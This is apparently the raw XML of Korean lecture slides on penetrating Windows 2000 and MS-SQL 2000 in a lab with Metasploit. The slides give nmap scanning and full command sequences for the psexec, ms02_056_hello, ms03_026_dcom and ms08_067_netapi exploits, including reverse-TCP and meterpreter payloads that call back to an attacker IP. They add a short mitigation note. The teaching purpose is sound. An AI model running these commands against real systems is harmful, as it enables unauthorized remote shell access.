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윈도우 기반 운영체제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모듈은 버퍼오버플로우를 사용하기 때문에 계정과 비밀번호가 없어도 침투가 가능하다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이러한 취약점을 보완하기 위해서는 sa 계정의 사용을 금지하고 xp_cmdshell 기능을 중지해야 한다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운영체제 침투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RPC(Remote Procedure Call)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 서비스와 관련있는 기법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RPC:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 원격제어를 위한 기법으로 다른 주소 공간에서 함수를 실행시킬 수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ms03_026_dcom.rb 모듈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/usr/share/metasploit-framework/modules/exploits/windows/dcerpc/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cve-2003-0352 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>취약점을 이용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ms03_026_dcom.rb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 사용형식 작성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use exploit/windows/dcerpc/ms03_026_dcom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payload windows/meterpreter/reverse_tcp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rhost 192.168.10.201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lhost 192.168.10.220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lport 443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exploit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ms03_026_dcom.rb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SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 취약점을 이용한 공격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ms08_067_netapi.rb 모듈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/usr/share/metasploit-framework/modules/exploits/windows/smb/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cve-2008-4250 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>취약점을 이용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ms08_067_netapi.rb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윈도우 기반의 운영체제 침투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포트 스캐닝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psexec.rb 모듈을 이용한 침투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ms02_056_hello.rb 모듈을 이용한 침투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ms0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>_0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>6_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>dcom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>모듈을 이용한 침투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ms0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>_0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>67</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>netapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>모듈을 이용한 침투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MSF 보조기능 구문 -&gt; use auxiliary</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>MSF 침투기능 구문 -&gt; use exploit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윈도우 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>침투 모듈 위치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/usr/share/doc/metasploit-framework/modules/exploit/windows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공격대상: 윈도우 2000 서버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윈도우 기반의 운영체제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처음 침투를 위해서는 침투할 서버의 네트워크에 대해 조사를 해야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ip 주소를 알고 있으므로 ip 주소를 nmap을 활용하여 포트 스캐닝 진행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nmap을 이용하여 침투할 서버에 대해 조사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nmap -sT -sV -O 192.168.10.201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포트 스캐닝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SMB 서비스: 폴더 공유 제공, psexec.rb 모듈로 침투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/usr/share/doc/metasploit-framework/modules/exploit/windows/smb/psexec.rb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소스 코드 안에 cve1999-0504라는 내용이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cve1999-0504: 계정과 비밀번호를 이용해 페이로드를 실행하는 취약점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psexec.rb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msf에서 다음과 같이 차례로 입력하여 공격을 수행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 exploit/windows/smb/psexec  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>use 공격/운영체제/취약점분야/사용할모듈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set payload windows/shell/bind_tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>set 악성코드 타겟 운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>작업환경/통신방식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set rhost 윈도우ip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set smbuser administrator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set smbpass 1234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exploit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bind_tcp: 정방향 접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> reverse_tcp: 역방향 접속 (방화벽X)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모두 입력하면 윈도우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 터미널 사용 가능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psexec.rb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93115" cy="421225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ms-sql 2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서버를 대상으로 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파악한 위치로 들어가 모듈을 열어보면 cve-2002-1123이 나온다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cve-2002-1123: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>MS-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 2000 서버의 버퍼 오버플로우를 이용해 페이로드를 실행하는 취약점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xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: MS-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 서버에서 사용하는 계정을 이용해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>윈도우 운영체제를 제어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MS-SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서버와 윈도우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>운영체제를 연동해 개발환경의 편리성을 제공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ms02_056_hello.rb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/>
              <a:t>보조기능인 mssql_enum.rb 모듈을 이용하여 xp_cmdshell 사용 여부를 확인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use auxiliary/admin/mssql/mssql_enum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rhost 윈도우ip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rport 1433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username sa		//mssql 기본 이름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password 1234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thread 256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run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 lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>실행 결과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>xp_cmdshell is Enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>해당 기능을 사용중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ms02_056_hello.rb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ms02_056_hello.rb 모듈을 사용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use exploit/windows/mssql/ms02_056_hello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payload windows/shell/reverce_tcp	//역방향접속!!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rhost 윈도우ip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lhost 공격자ip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set lport 443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exploit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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>접속성공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netstat -n 으로 확인해보면 윈도우(공격대상자)가 칼리(공격자)에게 접속한 내용 확인 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ms02_056_hello.rb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331</ep:Words>
  <ep:PresentationFormat>와이드스크린</ep:PresentationFormat>
  <ep:Paragraphs>95</ep:Paragraphs>
  <ep:Slides>14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3. 윈도우 기반 운영체제 침투</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>윈도우 기반의 운영체제 침투</vt:lpstr>
      <vt:lpstr>포트 스캐닝</vt:lpstr>
      <vt:lpstr>psexec.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>psexec.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>ms02_056_hello.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>ms02_056_hello.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>ms02_056_hello.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>운영체제 침투 분석</vt:lpstr>
      <vt:lpstr>ms03_026_dcom.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>ms03_026_dcom.rb 모듈을 이용한 침투</vt:lpstr>
      <vt:lpstr>ms08_067_netapi.rb 모듈을 이용한 침투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2021-10-11T14:45:58.532</dcterms:modified>
  <cp:revision>339</cp:revision>
  <dc:title>PowerPoint 프레젠테이션</dc:title>
  <cp:version/>
</cp:coreProperties>
</file>